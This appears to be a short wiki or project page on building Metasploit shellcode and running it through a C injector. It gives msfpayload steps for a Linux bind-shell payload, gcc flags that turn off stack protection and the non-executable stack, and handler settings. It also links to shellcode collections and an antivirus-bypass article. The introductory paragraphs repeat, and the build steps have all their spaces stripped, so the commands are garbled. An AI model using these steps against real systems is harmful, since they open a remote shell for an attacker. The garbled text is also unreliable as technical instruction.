In computer security, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine but any piece of code that performs a similar task can be called shellcode. Because the function of a payload is not limited to merely spawning a shell. shellcode wikipedia: http://en.wikipedia.org/wiki/Shellcode
"UNIX/BSD exec.c FUNTION"
Build shellcode using metasploit and execute it using this injector written in C
This 'injector' written in C only works in unix/bsd based distros and on windows if they have the C interpreter turn on. (in unix systems C its active by default), we just need to inject our shellcode into exec.c funtion 'unsigned char buf [] =' and compile it using gcc to make it executable under UNIX/BSD based distros...
To install the gcc package and kernel sources in the Debian/Ubuntu Linux distribution, write in terminal: apt-get install gcc make linux-headers-$(uname -r)
"HOW TO BUILD/RUN"GENERATING:msfpayloadlinux/x86/shell_bind_tcpLHOST=192.168.1.68LPORT=666C>>shellcode.txtPASTE:shellcodeintotheexec.cinjector"unsigned char code[] ="COMPILING:gcc-fno-stack-protector-zexecstackexec.c-oshellcodeHANDLER:msfcliexploit/multi/handlerPAYLOAD=linux/x86/shell_bind_tcpLHOST=192.168.1.68LPORT=666EEXECUTE:./shellcode
In computer security, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine but any piece of code that performs a similar task can be called shellcode. Because the function of a payload is not limited to merely spawning a shell. shellcode wikipedia: http://en.wikipedia.org/wiki/Shellcode
Build shellcode using metasploit and execute it using this injector written in C
This 'injector' written in C only works in unix/bsd based distros and on windows if they have the C interpreter turn on. (in unix systems C its active by default), we just need to inject our shellcode into exec.c funtion 'unsigned char buf [] =' and compile it using gcc to make it executable under UNIX/BSD based distros...
To install the gcc package and kernel sources in the Debian/Ubuntu Linux distribution, write in terminal: apt-get install gcc make linux-headers-$(uname -r)
project shellcode: http://www.projectshellcode.com/?q=node/12
reverse_tcp_bind_shell(92bytes): http://www.exploit-db.com/exploits/25497/
http://penturalabs.wordpress.com/2014/07/18/execute-shellcode-bypassing-anti-virus/
http://pentesterconfessions.blogspot.pt/2007/10/overview-this-will-be-quick-article.html
shell-storm: http://shell-storm.org/shellcode/
exploit-db: http://www.exploit-db.com/shellcode/
exec.c (C funtion): http://pastebin.com/WkBEWM8x
Video not available
Last edit: pedro ubuntu 2015-01-04